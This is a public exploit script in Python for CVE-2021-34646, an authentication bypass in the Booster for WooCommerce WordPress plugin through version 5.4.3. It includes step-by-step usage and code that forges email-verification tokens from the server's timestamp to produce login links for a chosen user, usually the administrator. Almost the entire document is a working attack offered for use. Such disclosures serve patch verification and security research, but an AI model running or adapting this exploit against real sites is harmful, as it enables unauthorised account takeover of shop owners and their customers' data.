# Exploit Title: WordPress Plugin WooCommerce Booster Plugin 5.4.3 - Authentication Bypass # Date: 2021-09-16 # Exploit Author: Sebastian Kriesten (0xB455) # Contact: https://twitter.com/0xB455 # # Affected Plugin: Booster for WooCommerce # Plugin Slug: woocommerce-jetpack # Vulnerability disclosure: https://www.wordfence.com/blog/2021/08/critical=-authentication-bypass-vulnerability-patched-in-booster-for-woocommerce/ # Affected Versions: <= 5.4.3 # Fully Patched Version: >= 5.4.4 # CVE: CVE-2021-34646 # CVSS Score: 9.8 (Critical) # Category: webapps # # 1: # Goto: https://target.com/wp-json/wp/v2/users/ # Pick a user-ID (e.g. 1 - usualy is the admin) # # 2: # Attack with: ./exploit_CVE-2021-34646.py https://target.com/ 1 # # 3: # Check-Out out which of the generated links allows you to access the system # import requests,sys,hashlib import argparse import datetime import email.utils import calendar import base64 B = "\033[94m" W = "\033[97m" R = "\033[91m" RST = "\033[0;0m" parser = argparse.ArgumentParser() parser.add_argument("url", help="the base url") parser.add_argument('id', type=int, help='the user id', default=1) args = parser.parse_args() id = str(args.id) url = args.url if args.url[-1] != "/": # URL needs trailing / url = url + "/" verify_url= url + "?wcj_user_id=" + id r = requests.get(verify_url) if r.status_code != 200: print("status code != 200") print(r.headers) sys.exit(-1) def email_time_to_timestamp(s): tt = email.utils.parsedate_tz(s) if tt is None: return None return calendar.timegm(tt) - tt[9] date = r.headers["Date"] unix = email_time_to_timestamp(date) def printBanner(): print(f"{W}Timestamp: {B}" + date) print(f"{W}Timestamp (unix): {B}" + str(unix) + f"{W}\n") print("We need to generate multiple timestamps in order to avoid delay related timing errors") print("One of the following links will log you in...\n") printBanner() for i in range(3): # We need to try multiple timestamps as we don't get the exact hash time and need to avoid delay related timing errors hash = hashlib.md5(str(unix-i).encode()).hexdigest() print(f"{W}#" + str(i) + f" link for hash {R}"+hash+f"{W}:") token='{"id":"'+ id +'","code":"'+hash+'"}' token = base64.b64encode(token.encode()).decode() token = token.rstrip("=") # remove trailing = link = url+"my-account/?wcj_verify_email="+token print(link + f"\n{RST}")